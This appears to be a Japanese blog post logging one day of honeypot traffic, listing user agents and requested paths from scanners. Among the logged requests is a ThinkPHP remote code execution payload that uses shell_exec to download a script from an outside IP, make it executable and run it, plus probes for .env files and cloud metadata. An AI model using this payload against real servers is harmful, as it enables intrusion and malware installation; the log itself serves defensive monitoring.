2019/05/13 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録
2019/05/13分です。

アクセス数としては落ち着いた1日でしたが
ThinkPHPの脆弱性狙いのアクセスは継続しています。

総アクセス数：44 (前日比：-764)

都合により
GET / HTTP/1.1
POST / HTTP/1.1
は除いています。

UserAgent一覧

件数	UserAgent
12	-
3	curl/7.29.0
2	Go-http-client/1.1
1	masscan/1.0 (https://github.com/robertdavidgraham/masscan)
1	Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
3	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
18	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数	Method	Request	Protocol
1	-	-	-
5	CONNECT	antei.xyz:443	HTTP/1.1
1	GET	/admin.php	HTTP/1.1
2	GET	/echo.php	HTTP/1.1
2	GET	/elrekt.php	HTTP/1.1
3	GET	/.env	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
1	GET	http://169[.]254[.]169[.]254/latest/meta-data	HTTP/1.1
1	GET	http://5[.]188[.]210[.]101/echo.php	HTTP/1.1
2	GET	/index.php	HTTP/1.1
2	GET	/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
2	GET	/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81[.]6[.]42[.]123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;	HTTP/1.1
3	GET	/manager/html	HTTP/1.1
1	GET	/phpmyadmin	HTTP/1.1
2	GET	/public/index.php	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
1	GET	/v1/agent/self	HTTP/1.1\n
1	HEAD	/robots.txt	HTTP/1.0
2	HEAD	/robots.txt	HTTP/1.1
2	POST	/index.php?s=captcha	HTTP/1.1